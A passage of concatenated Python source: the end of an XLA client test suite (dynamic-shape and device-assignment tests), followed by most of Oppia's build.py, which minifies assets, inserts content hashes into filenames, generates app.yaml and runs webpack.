self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
np.testing.assert_equal)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testDynamicShapeArgs(self, dtype):
full_size = 10
dynamic_shape_size = 4
# subcomputation 1
binary_add_builder = self._NewComputation()
scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
ops.Add(
ops.Parameter(binary_add_builder, 0, scalar_shape),
ops.Parameter(binary_add_builder, 1, scalar_shape))
# subcomputation 2
reshape_reduce_builder = self._NewComputation()
dshape = xla_client.Shape.array_shape(
np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
ops.Reduce(
reshape_reduce_builder,
operands=[reshape_reduce_p],
init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
computation=binary_add_builder.build(),
dimensions_to_reduce=[0])
# main computation: sum(range(full_size)[:dynamic_shape_size])
c = self._NewComputation()
arg = np.array(dynamic_shape_size, dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
reshaped = ops.DynamicReshape(
ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
[full_size], [True])
ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
class DeviceAssignmentTest(ComputationTest):
def testSerialize(self):
shape = (3, 4)
device_assignment = xla_client.DeviceAssignment.create(
np.arange(np.prod(shape)).reshape(*shape))
self.assertEqual(device_assignment.replica_count(), shape[0])
self.assertEqual(device_assignment.computation_count(), shape[1])
serialized = device_assignment.serialize()
self.assertIsInstance(serialized, bytes)
self.assertNotEmpty(serialized)
tests.append(DeviceAssignmentTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
backends = {
"cpu": xla_client.make_cpu_client,
"gpu": xla_client.make_gpu_client,
}
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target platform.")
# pylint: disable=unnecessary-lambda
InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
# pylint: enable=unnecessary-lambda
absltest.main()
build.py
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import collections
import fnmatch
import hashlib
import json
import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', ''),
'out_dir': os.path.join('build', 'templates', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This json file contains a json object. The object's keys are file paths and
# the values are the corresponding hash values. The paths need to be in posix
# style, as they are interpreted by the `url-interpolation` service, which
# treats the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
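# Illustrative (hypothetical) hashes.json entry: a frontend-visible,
# posix-style path mapped to the md5 hash of the file's contents, e.g.
#   {"/images/logo.png": "d41d8cd98f00b204e9800998ecf8427e"}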
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_DEV_CONFIG = 'webpack.dev.config.ts'
WEBPACK_DEV_SOURCE_MAPS_CONFIG = 'webpack.dev.sourcemap.config.ts'
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
WEBPACK_PROD_SOURCE_MAPS_CONFIG = 'webpack.prod.sourcemap.config.ts'
WEBPACK_TERSER_CONFIG = 'webpack.terser.config.ts'
# Files with these extensions shouldn't be moved to the build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts', '.gitkeep')
# Files with these name patterns shouldn't be moved to the build directory,
# and will not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'expressions', 'parser.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain a
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files, or should not be moved to the build directory.
# Statically served pages from app.yaml should be here too, since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/*',
)
PAGES_IN_APP_YAML = (
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/login-page.mainpage.html',
'webpack_bundles/logout-page.mainpage.html',
'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/playbook.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html'
)
# NOTE: These pages manage user sessions. Thus, we should never reject or
# replace them when running in maintenance mode; otherwise admins will be unable
# to access the site.
AUTH_PAGE_PATHS = (
'webpack_bundles/login-page.mainpage.html',
'webpack_bundles/logout-page.mainpage.html',
)
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*.component.html',
'*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json', '*.webp')
HASH_BLOCK_SIZE = 2**20
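# 2**20 bytes == 1 MiB; generate_md5_hash reads files in chunks of this size
# so that large files are never loaded into memory all at once.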
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(
description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_env')
_PARSER.add_argument(
'--deploy_mode', action='store_true', default=False, dest='deploy_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
_PARSER.add_argument(
'--deparallelize_terser',
action='store_true',
default=False,
dest='deparallelize_terser',
help='Disable parallelism on terser plugin in webpack. Use with prod_env.')
_PARSER.add_argument(
'--maintenance_mode',
action='store_true',
default=False,
dest='maintenance_mode',
help=(
'Enable maintenance mode, '
'meaning that only super admins can access the site.'
)
)
_PARSER.add_argument(
'--source_maps',
action='store_true',
default=False,
dest='source_maps',
help='Build webpack with source maps.')
def generate_app_yaml(deploy_mode=False, maintenance_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
deploy_mode: bool. Whether the script is being called from deploy
script.
maintenance_mode: bool. Whether the site should be put into
maintenance mode.
"""
prod_file_prefix = 'build/'
maintenance_page_path = 'webpack_bundles/maintenance-page.mainpage.html'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in PAGES_IN_APP_YAML:
if maintenance_mode and file_path not in AUTH_PAGE_PATHS:
content = content.replace(
file_path, prod_file_prefix + maintenance_page_path)
else:
content = content.replace(
file_path, prod_file_prefix + file_path)
if deploy_mode:
# The version: default line is required to run jobs on a local server (
# both in prod & non-prod env). This line is not required when app.yaml
# is generated during deployment. So, we remove this if the build
# process is being run from the deploy script.
content = content.replace('version: default', '')
# The FIREBASE_AUTH_EMULATOR_HOST environment variable is only needed to
# test locally, and MUST NOT be included in the deployed file.
content = re.sub(' FIREBASE_AUTH_EMULATOR_HOST: ".*"\n', '', content)
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
def modify_constants(
prod_env=False, emulator_mode=True, maintenance_mode=False):
"""Modify constants.ts and feconf.py.
Args:
prod_env: bool. Whether the server is started in prod mode.
emulator_mode: bool. Whether the server is started in emulator mode.
maintenance_mode: bool. Whether the site should be put into
the maintenance mode.
"""
dev_mode_variable = (
'"DEV_MODE": false' if prod_env else '"DEV_MODE": true')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"DEV_MODE": (true|false)',
dev_mode_variable)
emulator_mode_variable = (
'"EMULATOR_MODE": true' if emulator_mode else '"EMULATOR_MODE": false')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"EMULATOR_MODE": (true|false)',
emulator_mode_variable
)
enable_maintenance_mode_variable = (
'ENABLE_MAINTENANCE_MODE = %s' % python_utils.UNICODE(maintenance_mode))
common.inplace_replace_file(
common.FECONF_PATH,
r'ENABLE_MAINTENANCE_MODE = (True|False)',
enable_maintenance_mode_variable)
def set_constants_to_default():
"""Set variables in constants.ts and feconf.py to default values."""
modify_constants(prod_env=False, emulator_mode=True, maintenance_mode=False)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
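# Illustrative resulting command (the source and target paths below are
# hypothetical; real paths are relative and posix-style):
#   java -Xmx24m -jar ../oppia_tools/yuicompressor-2.4.8/yuicompressor-2.4.8.jar -o <target> <source>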
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued to be
processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
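# For example (illustrative values):
#   _insert_hash('css/oppia.css', 'a1b2c3') == 'css/oppia.a1b2c3.css'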
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to ensure
exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError. One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory paths as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError. The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain the directory path to /fonts inside the dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
minified_third_party_js_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
minified_third_party_css_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
third_party_js_filepath, minified_third_party_js_filepath)
_minify(third_party_css_filepath, minified_third_party_css_filepath)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(third_party_js_filepath)
safe_delete_file(third_party_css_filepath)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
webfonts_dir = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(third_party_js_filepath)
with python_utils.open_file(
third_party_js_filepath, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(third_party_css_filepath)
with python_utils.open_file(
third_party_css_filepath, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(webfonts_dir)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], webfonts_dir))
def build_using_webpack(config_path):
"""Execute webpack build process. This takes all TypeScript files we have in
/templates and generates JS bundles according to the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
Args:
config_path: str. Webpack config to be used for building.
"""
python_utils.PRINT('Building webpack')
cmd = '%s --max-old-space-size=2400 %s --config %s' % (
common.NODE_BIN_PATH, WEBPACK_FILE, config_path)
subprocess.check_call(cmd, shell=True)
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
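# Illustrative behaviour: 'images/logo.png' (hypothetical path) -> True,
# whereas 'webpack_bundles/about-page.mainpage.html' -> False because it
# matches the 'webpack_bundles/*' pattern in FILEPATHS_NOT_TO_RENAME.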
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to file we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
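# Hedged usage sketch for filter_hashes: only frontend-visible entries are
# kept and each surviving key gains a '/' prefix. The filepaths and hashes
# below are fabricated purely for illustration.
def _example_filter_hashes():
    sample = {
        'images/logo.png': 'd41d8cd98f00b204e9800998ecf8427e',
        'scripts/internal.py': '0cc175b9c0f1b6a831c399e269772661',
    }
    # Entries matching FILEPATHS_PROVIDED_TO_FRONTEND come back keyed as
    # '/images/logo.png' etc.; everything else is dropped.
    return filter_hashes(sample)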
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove whitespaces, interpolates paths in HTML to include
hashes in source directory and save edited file at target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
